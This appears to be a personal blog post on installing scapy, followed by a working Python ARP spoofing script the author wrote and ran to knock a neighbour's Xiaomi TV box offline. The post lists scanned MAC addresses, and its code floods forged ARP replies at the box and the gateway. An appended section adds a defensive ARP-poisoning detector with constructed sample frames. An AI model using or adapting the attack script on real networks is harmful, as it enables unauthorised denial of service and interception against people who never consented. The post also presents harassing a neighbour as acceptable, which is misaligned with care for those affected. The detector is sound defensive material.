I only recently learned about the scapy tool and wish I had found it sooner. Its strength is that it lets you craft and modify packets, and being Python-based it is very convenient to use.
I only really started studying TCP/IP half a year ago. I am no expert: I spent a month or so reading the FreeRTOS-TCP/IP source and was still lost, but at least the TCP/IP protocol part became much clearer.
I picked up Python a month ago and am slowly getting familiar with it.
Installing scapy on Ubuntu 14.04
My system already had Python 2.7 but no pip, so install pip first:

```shell
sudo apt-get install python-pip
```

If that fails, try the following:

```shell
sudo apt-get update --fix-missing
```

Once pip is installed, install scapy:

```shell
sudo pip install scapy
```

That completes the scapy installation. It can be tested as follows:

```
vmuser@linux-host:~/桌面$ python
Python 2.7.3 (default, Oct 26 2016, 21:04:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> a = IP()
>>> a
<IP |>
>>> get_if_hwaddr("eth0")
'00:0c:29:70:b1:85'
>>>
```

eth0 is my network interface.

Python 3.6

```shell
pip install scapy
```

or

```shell
pip3 install scapy-python3
```

ARP ATTACK EXAMPLE (1)
Hardware platform: Dragon Board 410C
OS: Debian
Python: 2.7
Living alone in a rented flat, you cannot avoid neighbours disturbing each other. Recently one tenant has been watching TV at no small volume, and I happened to have a development board at hand, so I planned to use scapy to launch an ARP attack and knock them offline.
A brief word on how an ARP attack works: basically you forge ARP messages to poison the ARP cache of a host or of the gateway; the more elaborate variants impersonate the gateway to mount a man-in-the-middle attack. Given my limited skill, I will keep it as simple as possible.
First, find out what kind of device the other side has. Use a LAN scanning tool to scan for live hosts, then use the MAC vendor prefix to work out which MAC address is the one. The scan results:

C8-3A-35-C0-05-15  Tenda Technology Co., Ltd.
04-E6-76-46-A6-F3  AMPAK Technology, Inc.
78-02-F8-34-4D-B5  private
24-09-95-95-E2-02  HUAWEI TECHNOLOGIES CO.,LTD
20-47-47-BA-99-1E  Dell Inc.
70-14-A6-37-3F-0F  Apple, Inc.
E8-B4-C8-7B-F3-0F  Samsung Electronics Co.,Ltd
48-3B-38-D9-8D-D8  Apple, Inc.

Of these, the "AMPAK" entry is the most suspicious; after some searching on Baidu I identified it as a Xiaomi box. (Aside: AMPAK devices have repeatedly been spotted doing IP scanning....)
With the MAC pinned down, I figured they (an elderly couple who watch TV all day, so noisy!!) would not get away.
```python
#!/usr/bin/env python
# _*_ coding=utf-8 _*_

from scapy.all import *
import time
import random
#-------------------------------------------------------
def GetSubNet(OurIP):
    '''
    Get the subnet prefix including the trailing dot, e.g. "192.168.0."
    '''
    Index = 0
    SubString = ""
    while True:
        num = OurIP.find('.',Index)
        if num != -1:
            Index = num + 1
        if num == -1:
            SubString = OurIP[:Index]
            break
    return SubString
#-------------------------------------------------------
def GetMac(tgtIP):
    '''
    Get the MAC address of the target IP.
    tgtIP: target IP address
    '''
    try:
        tgtMac = getmacbyip(tgtIP)
        return tgtMac
    except:
        print (tgtIP,"please check whether the target IP is up")
#-------------------------------------------------------
def GetBrocastIP(OurIP):
    '''
    Get the LAN broadcast address.
    OurIP: our own IP address
    '''
    return GetSubNet(OurIP) + "255"
#-------------------------------------------------------
def GetForgetIP(OurIP,Num):
    '''
    Forge IP addresses.
    OurIP: our own IP
    Num: how many IP addresses to forge
    '''
    SubString = GetSubNet(OurIP)
    #forge IPs
    ForgetIP = []
    i = 0
    while i < Num:
        num = int(random.uniform(0,255))
        TempIP = SubString + "%d"%num
        if TempIP == OurIP:
            continue
        else:
            ForgetIP.append(TempIP)
            i = i + 1
    return ForgetIP
#-------------------------------------------------------
def GetForgeMac(OurMac,Num):
    '''
    Generate random MAC addresses.
    OurMac: our own MAC address, which must not be repeated
    Num: how many MAC addresses to generate
    '''
    ForgeMac = []
    j = 0
    while j < Num:
        while True:
            i = 0
            TempMac = ""
            while i < 6:
                num = int(random.uniform(0,255))
                TempMac = TempMac + "%02X"%num
                if i <= 4:TempMac = TempMac + ":"
                i = i + 1
            if TempMac == OurMac:
                pass
            else:
                ForgeMac.append(TempMac)
                j = j + 1
                break
    return ForgeMac
#-------------------------------------------------------
def AttackMac(Mac,face,Num,Interval,GW_IP):
    '''
    Attack a MAC address.
    Mac: the MAC address to attack
    face: network interface used to send the packets
    Num: number of forged addresses per round
    Interval: delay between rounds in seconds
    GW_IP: gateway IP; if non-empty, only the gateway is targeted
    '''
    Broadcast_mac = "FF:FF:FF:FF:FF:FF"
    GW_MAC = ""
    try:
        OurIP = get_if_addr(face)
        if GW_IP != "":GW_MAC = GetMac(GW_IP)
    except:
        OurIP = "192.168.0.105"
        return
    Broadcast_ip = GetBrocastIP(OurIP)
    while True:
        ForgeIP = GetForgetIP(OurIP,Num)
        #build the packets
        if GW_IP != "":
            #target the gateway
            pkt = Ether(dst = GW_MAC,src = Mac)/\
                  ARP(psrc = ForgeIP,pdst = GW_IP,\
                      hwsrc = Mac,hwdst = GW_MAC,op = 2)
        else:
            #target the whole LAN
            pkt = Ether(dst = Broadcast_mac,src = Mac)/\
                  ARP(psrc = ForgeIP,pdst = Broadcast_ip,\
                      hwsrc = Mac,op = 1)
        #send the packets
        try:
            #print(ls(pkt))
            #input()
            sendp(pkt,iface = face)
        except:
            print("!!Send Error!!")
            break
        time.sleep(float(Interval))
#-------------------------------------------------------
def AttackIP(tgtIP,face,Num,Interval,GW_IP):
    '''
    Attack an IP address.
    tgtIP: target IP
    face: network interface
    Num: number of packets per round
    Interval: delay between rounds in seconds
    GW_IP: gateway IP; if non-empty, only the gateway is targeted
    '''
    #broadcast address
    GW_MAC = ""
    Broadcast_mac = "FF:FF:FF:FF:FF:FF"
    #local addresses
    try:
        OurMac = get_if_hwaddr(face)
        OurIP = get_if_addr(face)
        if GW_IP != "":GW_MAC = GetMac(GW_IP)
    except:
        OurMac = "00:00:00:00:00:00"
        OurIP = "192.168.0.105"
    Broadcast_ip = GetBrocastIP(OurIP)
    while True:
        #prepare the packets
        ForgeMac = GetForgeMac(OurMac,Num)
        if GW_IP != "":
            #target the gateway
            pkt = Ether(dst = GW_MAC,src = ForgeMac)/\
                  ARP(psrc = tgtIP,pdst = GW_IP,\
                      hwsrc = ForgeMac,hwdst = GW_MAC,op = 2)
        else:
            #target the whole LAN
            pkt = Ether(dst = Broadcast_mac,src = ForgeMac)/\
                  ARP(psrc = tgtIP,pdst = Broadcast_ip,\
                      hwsrc = ForgeMac,op = 1)
        #send the packets
        try:
            sendp(pkt,iface = face)
        except:
            print("!!Send Error!!")
            break
        #delay
        time.sleep(float(Interval))
#-------------------------------------------------------
Table = {}
def Scanf(OurIP,Start,End):
    '''
    Scan the network and record MAC -> IP pairs in Table.
    OurIP: our own IP address
    Start: first host number to scan
    End: host number at which to stop (exclusive)
    e.g. OurIP = 192.168.0.105, Start = 99, End = 150
    scans 192.168.0.99 ~ 192.168.0.149
    '''
    SubString = GetSubNet(OurIP)
    for num in range(Start,End):
        ip = SubString+str(num)
        arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
        res = srp1(arpPkt, timeout = 1, verbose=0)
        if res:
            #key by MAC (upper-cased, scapy reports lower-case) so GetIpByMac can find it
            Table[res.hwsrc.upper()] = res.psrc
    return Table
#-------------------------------------------------------
def GetIpByMac(Mac):
    if len(Table) == 0:return None
    return Table.get(Mac.upper())

def Attack_xiaomi(Face,PackNum,Counter,Interval):
    '''
    Attack the Xiaomi box.
    Face: network interface
    PackNum: number of packets per round
    Counter: number of rounds (-1: unlimited)
    Interval: upper bound of the random delay between rounds, in seconds
    e.g. Face="wlan0",PackNum=10,Counter=-1,Interval=1
    '''
    MY_ip = get_if_addr(Face)
    MY_mac = get_if_hwaddr(Face)
    if MY_ip == None or MY_mac == None:return

    GW_ip = "192.168.0.1"
    GW_mac = GetMac(GW_ip)
    if GW_mac == None:return

    Scanf(MY_ip,99,150)

    XM_mac = "04:E6:76:46:A6:F3"
    XM_ip = GetIpByMac(XM_mac)
    if XM_ip == None:return

    while True:
        #Attack packs
        Temp_mac = GetForgeMac(MY_mac,PackNum)
        Temp_ip = GetForgetIP(MY_ip,PackNum)

        PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2)
        PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2)
        PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2)
        PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2)
        try:
            sendp(PKT_2_XM_4_mac,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_XM_4_ip,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_GW_4_XM_mac,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_GW_4_XM_ip,iface = Face)
        except:
            print("!!Send Error!!")
        #sleep
        num = int(random.uniform(0,Interval))
        time.sleep(num)
        if Counter == -1:
            pass
        else:
            Counter = Counter - 1
            if Counter == 0:
                return

if __name__ == "__main__":
    #while True:
    #    AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1")
    #AttackMac(Mac,face,Num,Interval,GW_IP):
    #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108")
    while True:
        Attack_xiaomi("wlan0",20,30,5)
```
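The script above only shows the sending side. For the other side of the same exchange, here is an added example, written for this edit and not part of the original post: a pure-Python 3 parser for Ethernet/ARP frames (the same fields the scapy `Ether`/`ARP` layers expose: `op`, `hwsrc`, `psrc`, `hwdst`, `pdst`) plus a small watcher that flags what cache poisoning looks like on the wire. It needs no scapy. The sample frames are constructed inline rather than captured; the gateway MAC is assumed to be the Tenda address from the scan results, and the host, victim and attacker addresses are made up locally-administered values.

```python
"""Detect ARP cache poisoning patterns in raw Ethernet frames (Python 3, no scapy)."""
import struct
from collections import namedtuple

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_BODY = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

ArpFrame = namedtuple("ArpFrame", "eth_src eth_dst op hwsrc psrc hwdst pdst")


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def parse_arp(frame):
    """Return an ArpFrame for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < ETH_HDR.size + ARP_BODY.size:
        return None
    dst, src, etype = ETH_HDR.unpack_from(frame, 0)
    if etype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_BODY.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return ArpFrame(mac_str(src), mac_str(dst), op,
                    mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa))


def build_arp(eth_src, eth_dst, op, hwsrc, psrc, hwdst, pdst):
    """Serialize an ARP frame; used here only to construct the sample input."""
    return (ETH_HDR.pack(mac_bytes(eth_dst), mac_bytes(eth_src), ETHERTYPE_ARP) +
            ARP_BODY.pack(1, 0x0800, 6, 4, op, mac_bytes(hwsrc), ip_bytes(psrc),
                          mac_bytes(hwdst), ip_bytes(pdst)))


class ArpWatcher:
    """Flags ARP traffic that would poison a cache: a pinned IP claimed by another MAC,
    an IP flipping between MACs, gratuitous replies, and sender/Ethernet MAC mismatch."""

    def __init__(self, pinned):
        self.pinned = {ip: mac.lower() for ip, mac in pinned.items()}  # static IP -> MAC
        self.learned = {}  # IP -> last MAC seen claiming it

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return []
        alerts = []
        if arp.hwsrc != arp.eth_src:
            alerts.append(("eth_mismatch", "ARP sender %s vs Ethernet source %s" % (arp.hwsrc, arp.eth_src)))
        pinned = self.pinned.get(arp.psrc)
        if pinned is not None and arp.hwsrc != pinned:
            alerts.append(("pinned_violation", "%s claimed by %s, pinned to %s" % (arp.psrc, arp.hwsrc, pinned)))
        if arp.op == ARP_REPLY and arp.psrc == arp.pdst:
            alerts.append(("gratuitous", "gratuitous reply for %s from %s" % (arp.psrc, arp.hwsrc)))
        prev = self.learned.get(arp.psrc)
        if prev is not None and prev != arp.hwsrc:
            alerts.append(("flip", "%s moved from %s to %s" % (arp.psrc, prev, arp.hwsrc)))
        self.learned[arp.psrc] = arp.hwsrc
        return alerts


# Constructed sample traffic (not a real capture). The gateway MAC is the Tenda entry
# from the scan in the post, assumed to be the router; the other addresses are invented.
GW_IP, GW_MAC = "192.168.0.1", "c8:3a:35:c0:05:15"
HOST_IP, HOST_MAC = "192.168.0.105", "02:00:00:00:00:01"
VICTIM_IP, ATTACKER_MAC = "192.168.0.108", "02:00:00:00:00:aa"
BCAST_MAC, ZERO_MAC = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"

SAMPLE_FRAMES = [
    # 1. legitimate reply from the gateway
    build_arp(GW_MAC, HOST_MAC, ARP_REPLY, GW_MAC, GW_IP, HOST_MAC, HOST_IP),
    # 2. reply claiming the gateway IP from another MAC (cache poisoning)
    build_arp(ATTACKER_MAC, HOST_MAC, ARP_REPLY, ATTACKER_MAC, GW_IP, HOST_MAC, HOST_IP),
    # 3-4. requests for one IP from changing source MACs (the flooding pattern)
    build_arp("02:11:11:11:11:11", BCAST_MAC, ARP_REQUEST, "02:11:11:11:11:11", VICTIM_IP, ZERO_MAC, "192.168.0.255"),
    build_arp("02:22:22:22:22:22", BCAST_MAC, ARP_REQUEST, "02:22:22:22:22:22", VICTIM_IP, ZERO_MAC, "192.168.0.255"),
    # 5. an IPv4 frame, which the parser must ignore
    ETH_HDR.pack(mac_bytes(GW_MAC), mac_bytes(HOST_MAC), 0x0800) + b"\x45" + b"\x00" * 27,
    # 6. ARP body says gateway MAC, but the Ethernet header says otherwise
    build_arp(ATTACKER_MAC, HOST_MAC, ARP_REPLY, GW_MAC, GW_IP, HOST_MAC, HOST_IP),
]


def run_demo(frames=SAMPLE_FRAMES):
    """Feed frames through a watcher that pins the gateway; return alert kinds per frame."""
    watcher = ArpWatcher({GW_IP: GW_MAC})
    return [[kind for kind, _ in watcher.observe(f)] for f in frames]


if __name__ == "__main__":
    for i, kinds in enumerate(run_demo(), 1):
        print(i, kinds or "ok")
```

Pinning the gateway binding is the check that matters most here: the flooding functions in the post produce only "flip" alerts (an IP hopping between MACs), while the gateway-impersonation packets trip the pinned-binding check on the first frame, before any cache is actually overwritten.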